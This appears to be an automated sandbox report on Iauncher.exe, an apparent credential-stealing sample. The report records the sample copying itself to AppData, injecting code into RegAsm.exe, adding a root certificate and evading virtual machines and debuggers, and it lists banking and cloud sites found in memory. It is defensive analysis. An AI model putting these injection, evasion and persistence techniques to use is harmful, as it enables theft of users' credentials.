                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002891000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000027D6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000027EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Iauncher.exeReversingLabs: Detection: 23%
                          Source: unknownProcess created: C:\Users\user\Desktop\Iauncher.exe "C:\Users\user\Desktop\Iauncher.exe"
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: Window Recorder, Window detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Iauncher.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                          Source: Iauncher.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Iauncher.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressedlB source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Iauncher.exe
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp

                          Data Obfuscation

                          Source: Iauncher.exe, AssemblyLoader.cs, .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: Yara match, File source: Iauncher.exe, type: SAMPLE
                          Source: Yara match, File source: 0.0.Iauncher.exe.590000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000000.00000000.1184729227.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match, File source: 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: Iauncher.exe PID: 6692, type: MEMORYSTR
                          Source: Iauncher.exe, Static PE information: 0xACDA9736 [Wed Nov 23 21:25:10 2061 UTC]
                          Source: C:\Users\user\Desktop\Iauncher.exe, Code function: 0_2_05D6E7BB push eax; ret 0_2_05D6E7C1
                          Source: C:\Users\user\Desktop\Iauncher.exe, Code function: 0_2_05DB8940 push esp; ret 0_2_05DB8941
                          Source: C:\Users\user\Desktop\Iauncher.exe, Code function: 0_2_09CA36D7 push ebx; iretd 0_2_09CA36DA
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_005959B6 push es; retn 0000h 11_2_00595AC6
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_00595AD8 push es; retn 0000h 11_2_00595AC6
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_00595AD8 push es; ret 11_2_00595AD5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_00595AC9 push es; retn 0000h 11_2_00595AC6
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_00595AC9 push es; ret 11_2_00595AD5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_005662BA push ecx; ret 11_2_005662CD
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_00595B45 push es; retf 0000h 11_2_00595B32
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe, Code function: 11_2_00595B45 push es; retf 11_2_00595B42
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 13_2_05D81015 push FFFFFF8Bh; ret 13_2_05D8101A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 13_2_05DA804D push ecx; iretd 13_2_05DA8052
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 13_2_05DAECF2 push eax; ret 13_2_05DAED01
                          Source: Iauncher.exe, Static PE information: section name: .text entropy: 7.90237020530487

                          Persistence and Installation Behavior

                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                          Source: C:\Users\user\Desktop\Iauncher.exe, File created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe (dropped file)
                          Source: C:\Users\user\Desktop\Iauncher.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\Iauncher.exe Memory allocated: FD0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\Iauncher.exe Memory allocated: 2A10000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\Iauncher.exe Memory allocated: 2910000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: AC0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2430000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: B10000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\Iauncher.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\Iauncher.exe Thread delayed: delay time: 600000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\Iauncher.exe Window / User API: threadDelayed 7148
                          Source: C:\Users\user\Desktop\Iauncher.exe Window / User API: threadDelayed 2710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1414
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1592
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204 Thread sleep time: -24903104499507879s >= -30000s
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204 Thread sleep time: -600000s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7652 Thread sleep time: -12912720851596678s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7348 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe Code function: 11_2_0057960E FindFirstFileExW,11_2_0057960E
                          Source: RegAsm.exe, 0000000D.00000002.1432276704.0000000000786000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: Iauncher.exe, 00000000.00000002.3682596392.0000000005619000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1432276704.0000000000786000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0056AAD3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00570E87 mov ecx, dword ptr fs:[00000030h]11_2_00570E87
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057A789 mov eax, dword ptr fs:[00000030h]11_2_0057A789
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057CD88 GetProcessHeap,11_2_0057CD88
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0056AAD3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566A95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00566A95
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00566D9F
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566EFB SetUnhandledExceptionFilter,11_2_00566EFB
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 321008
                          Source: C:\Users\user\Desktop\Iauncher.exe; Process created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: 11_2_0056687C cpuid 11_2_0056687C
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetLocaleInfoW,11_2_0057C828
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_0057C951
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetACP,IsValidCodePage,GetLocaleInfoW,11_2_0057C1C2
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetLocaleInfoW,11_2_0057CA57
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0057CB26
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: EnumSystemLocalesW,11_2_0057C464
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: EnumSystemLocalesW,11_2_0057C4AF
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: EnumSystemLocalesW,11_2_0057C54A
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetLocaleInfoW,11_2_00575D19
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0057C5D5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe; Code function: EnumSystemLocalesW,11_2_005757F3
                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Users\user\Desktop\Iauncher.exe VolumeInformation
                          Source: C:\Users\user\Desktop\Iauncher.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
